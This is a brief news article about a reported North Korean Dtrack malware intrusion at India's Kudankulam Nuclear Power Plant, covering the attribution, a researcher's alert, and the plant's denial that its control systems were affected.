India's Kudankulam Nuclear Power Plant becomes victim of cyber attack

30 Oct, 2019
  • The attack is being tied to North Korea.
  • The cyber attack targeted research and technical data and was focused on collection of technical information.
  • 'Dtrack' was the same malware which wiped hard drives at South Korean media companies and banks in 2013.

The most powerful station in India, the Kudankulam Nuclear Power Plant, recently became the target of a cyber attack.

The malware, which researchers have identified as North Korea's Dtrack, was reported by Pukhraj Singh, a cyber security professional, to have gained 'domain controller-level access' at Kudankulam. Dtrack is the same malware which was tied to North Korea's Lazarus threat group by researchers based on code shared with DarkSeoul. The malware attack wiped hard drives at South Korean media companies and banks in 2013.

Singh said that he was alerted to the malware by a 'third party', after which he alerted the National Cyber Security Coordinator on September 3. The attack targeted research and technical data and was focused on collection of technical information, using a Windows SMB network drive share with credentials hard-coded into the malware to aggregate files to steal.

However, the plant denied that it was a victim of the cyber attack and said that any cyber attack 'on the Nuclear Power Plant Control System is not possible'. The statement further said that the control systems network is isolated from the plant's administrative networks. Following their statement, Singh said that maybe they were confusing control systems with a domain controller. "They're different things," Singh tweeted.

According to research, instead of attacking the nuclear infrastructure and controllers directly, the attack aimed to steal information. It is unclear how much information was actually stolen.
